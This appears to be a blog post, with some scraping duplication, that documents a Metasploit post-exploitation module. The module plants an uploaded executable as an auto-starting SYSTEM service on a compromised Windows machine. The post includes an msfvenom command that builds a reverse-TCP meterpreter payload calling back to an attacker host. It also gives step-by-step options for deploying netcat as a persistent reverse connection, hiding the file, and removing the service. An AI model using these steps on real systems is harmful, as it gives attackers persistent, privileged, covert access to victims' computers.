[What Does This Module Do?]
-- HIDING PAYLOAD :
-- CHECKING SERVICE STATUS :
-- DELETING REMOTE SERVICE : :
1* set DEL_SERVICE true
2* set SERVICE_NAME infection
3* set SESSION 1
--WARNING: This module will not delete the payload deployed"
Expected Results :
deploy_service_payload.rb uploads your payload.exe to target system (DEPLOY_PATH) and creates a service pointing to it (SERVICE_NAME).
The service will auto-start with windows with Local/System privileges. Rebooting the system or restarting the service will run the malicious executable with elevated privileges. "WARNING: This
module only supports .exe executables to upload".
[NOTE]
BUILD SERVICE PAYLOAD:
$ sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<Attacker Port> -a x86 --platform windows -f exe-service -o Program.exe
--WARNING: This module will not delete the payload deployed"
--WARNING: Note that only executables explicitly written to interface with the Service Control
--Manager should be installed this way. While SC will happily accept a regular non-service binary,
you will receive the fatal Error 1053 when you attempt to start the service, please read the follow
--Article: How to Run Any Program as a Background Service in Windows
[NOTE]
BUILD SERVICE PAYLOAD:
$ sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<Attacker Port> -a x86 --platform windows -f exe-service -o Program.exe
--WARNING: This module will not delete the payload deployed"
--WARNING: Note that only executables explicitly written to interface with the Service Control
--Manager should be installed this way. While SC will happily accept a regular non-service binary,
you will receive the fatal Error 1053 when you attempt to start the service, please read the follow
--Article: How to Run Any Program as a Background Service in Windows
[INFO]
[INSTALLATION]
1* Download Module from {HERE}
2* Copy the ruby file in
/{path}/metesploit-framework/modules/post/windows/manage/
3* Open msfconsole and issue command "reload_all" to reload paths.
4* use post/windows/manage/deploy_service_payload
4* use post/windows/manage/deploy_service_payload
[ADVANCED OPTIONS]
[USAGE]
NOTE: Im the follow example we are going to deploy a NETCAT executable on attacker machine (Its not mandatory the use of netcat [ nc.exe ], Default its to deploy a built-in service executable).
To be able to deploy a NETCAT client we need to activate module options 'USE_NETCAT' | 'NC_LHOST' | 'NC_LPORT' and manually set a NETCAT lhandler to recibe the remote service connection...
-- DEPLOYING PAYLOAD :
To be able to deploy a NETCAT client we need to activate module options 'USE_NETCAT' | 'NC_LHOST' | 'NC_LPORT' and manually set a NETCAT lhandler to recibe the remote service connection...
-- DEPLOYING PAYLOAD :
1* set USE_NETCAT true
2* set NC_LPORT 31337
3* set NC_LHOST 192.168.0.100
4* set DEPLOY_PATH {deployment path in victim box}
5* set LOCAL_PATH /home/{user}/Desktop/nc.exe {executable to be uploaded}
6* set PAYLOAD_NAME nc.exe
7* set SERVICE_NAME infection
8* set SESSION 1
2* set NC_LPORT 31337
3* set NC_LHOST 192.168.0.100
4* set DEPLOY_PATH {deployment path in victim box}
5* set LOCAL_PATH /home/{user}/Desktop/nc.exe {executable to be uploaded}
6* set PAYLOAD_NAME nc.exe
7* set SERVICE_NAME infection
8* set SESSION 1
{Opening netcat Listener on Desired Port to recibe remote service connection}
$ sudo nc -lvp 31337
Expected Results :
-- HIDING PAYLOAD :
1* set HIDDEN_ATTRIB true
2* set DEPLOY_PATH {deployment path in victim box}
3* set PAYLOAD_NAME nc.exe
4* set SESSION 1
Expected Results :
Expected Results :
-- CHECKING SERVICE STATUS :
-- DELETING REMOTE SERVICE : :
1* set DEL_SERVICE true
2* set SERVICE_NAME infection
3* set SESSION 1
--WARNING: This module will not delete the payload deployed"
Expected Results :
[VIDEO DEMO]
[Credits]
Module Author: pedr0 Ubuntu [r00t-3xp10it]
Special Thanks: Fatima Ferreira | Chaitanya
Module Author: pedr0 Ubuntu [r00t-3xp10it]
Special Thanks: Fatima Ferreira | Chaitanya
0 comments:
Post a Comment